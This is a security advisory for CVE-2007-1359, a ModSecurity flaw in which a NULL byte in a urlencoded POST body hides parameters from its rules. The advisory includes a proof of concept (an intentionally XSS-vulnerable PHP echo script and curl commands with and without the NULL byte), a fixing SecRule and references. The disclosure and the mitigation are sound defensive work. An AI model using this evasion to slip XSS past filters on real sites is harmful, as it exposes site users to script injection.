ModSecurity contains a flaw that may allow a user to bypass security rules. The issue is triggered when ModSecurity parses POST requests with the application/x-www-form-urlencoded content type containing an un-encoded NULL byte (ASCIIZ) embedded in the payload. It is possible that the flaw may allow a remote user to submit malicious input to ModSecurity-protected sites by bypassing security rules that use variables that refer to request parameters (e.g. ARGS) due to ModSecurity not scanning anything beyond the NULL byte and resulting in a loss of confidentiality.

The ModSecurity rules can only be bypassed in certain circumstances:
1) Parameters must be transported in an application/x-www-form-urlencoded request body.
2) An un-encoded NULL byte (ASCIIZ) must be embedded in the payload.
3) The parser used by the web application must do things differently.

PHP versions lower than 5.2.0 are supposedly not susceptible to the ModSecurity POST data NULL byte filter bypass, but PHP versions 5.2.0 and higher are.

------------------------
Proof of Concept
------------------------
Place the following PHP script into a webroot (make sure server is off-line) that is vulnerable to XSS (standard PHP 5.2.0 and ModSecurity 2.1.0 installation):
<?php
if (isset($_POST['var'])
echo($_POST['var']);
?>

Calling the script with the following command will result in the example not being blocked, however error.log will inform you that a possible XSS attack was detected:
$ echo -e "&var=<script>alert(/xss/);</script>" > postdata
$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent <script>alert(/xss/);</script>

However, using a NULL byte in the command will not log a possible XSS attack in error.log, since ModSecurity cannot see the var parameter behind the NULL byte:
$ echo -e "\000&var=<script>alert(/xss/);</script>" > postdata
$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent <script>alert(/xss/);</script>

Upgrade to version 2.1.1-rc1 or higher as it has been reported to fix this vulnerability. It is also possible to correct the flaw by adding the following rule to your rule set:
SecRule REQUEST_BODY "@validateByteRange 1-255" \
"log,deny,phase:2,t:none,msg:'ModSecurity ASCIIZ Evasion Attempt'"

• CVE ID: 2007-1359 (see also: NVD)
• Bugtraq ID: 22831
• Secunia Advisory ID: 24373 25316 31087 31113
• SCIP VulDB ID: 2973
• ISS X-Force ID: 32872
• Milw0rm: 3425
• Exploit Database: 3425
• VUPEN Advisory: ADV-2007-0868
• Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2008-07/0240.html
• Vendor Specific Advisory URL: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00727143
  http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
• Other Advisory URL: http://security.gentoo.org/glsa/glsa-200705-17.xml
  http://www.php-security.org/MOPB/BONUS-12-2007.html
• Vendor URL: http://www.modsecurity.org/
• Vendor Specific Solution URL: http://www.modsecurity.org/blog/archives/2007/03/modsecurity_asc.html

• Stefan Esser - sesserhardened-php.net - www.hardened-php.net